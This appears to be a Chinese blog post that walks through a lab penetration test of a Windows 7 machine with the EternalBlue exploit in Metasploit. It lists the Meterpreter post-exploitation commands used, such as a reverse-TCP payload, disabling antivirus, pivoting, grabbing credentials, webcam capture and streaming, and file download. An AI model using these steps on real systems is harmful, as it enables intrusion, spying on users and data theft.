1、(信息收集)记录一次使用永恒之蓝的渗透过程

一、通过nmap扫描得知目标机开放了445端口,运行的操作版本为WIN7
在这里插入图片描述2、尝试使用永恒之蓝进行渗透
在这里插入图片描述
使用windows/x64/meterpreter/reverse_tcp PAYLOAD
设置好各项参数
成功进入meterperter工具
使用getpid获取Meterpreter Shell的进程号
在这里插入图片描述
继续使用ps查看本机运行的进程,选择一个稳定的系统进程,将shell迁移过去
在这里插入图片描述3、或者使用自动迁移命令 run post/windows/manage/migrate
在这里插入图片描述
4、获取目标机系统信息,查看是否运行在虚拟机上,查询运行时间,查看完整网络设置
在这里插入图片描述
5、关闭目标机器杀毒软件,开启远程桌面
在这里插入图片描述6、添加一条路由,然后就可以借助被攻陷的主机对其他网络进行攻击了。列举当前有多少用户登陆了目标机,可以看到用户XinSai在登录中。
在这里插入图片描述7、列举安装在目标机上的应用程序
在这里插入图片描述8、抓取自动登录的用户名和密码
在这里插入图片描述木有设置自动登录密码下去试试

9、屏幕截图与录像直播
1、load espia 插件,然后输入screengrab或者screenshot获取截图
然后使用’eog+照片path’即可查看,eog,即linux的内置图片查看器 eye of gmone 的缩写。
在这里插入图片描述
webcam_list查看目标机摄像头列表
webcam_snap打开摄像头并拍一张照片
webcam_stream开启直播模式,使用file:///root/xxx.html查看直播

shell进入目标机Shell下面,由于Linux和Windows编码不同会乱码,使用chcp 65001解决,exit结束会话。
search -f *.txt -d c:\ #搜索c盘中所有以.txt为后缀的文件 -f 搜索模式 -d 指定目录。
download c:\test.txt /root
upload /root/test.txt c:\

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值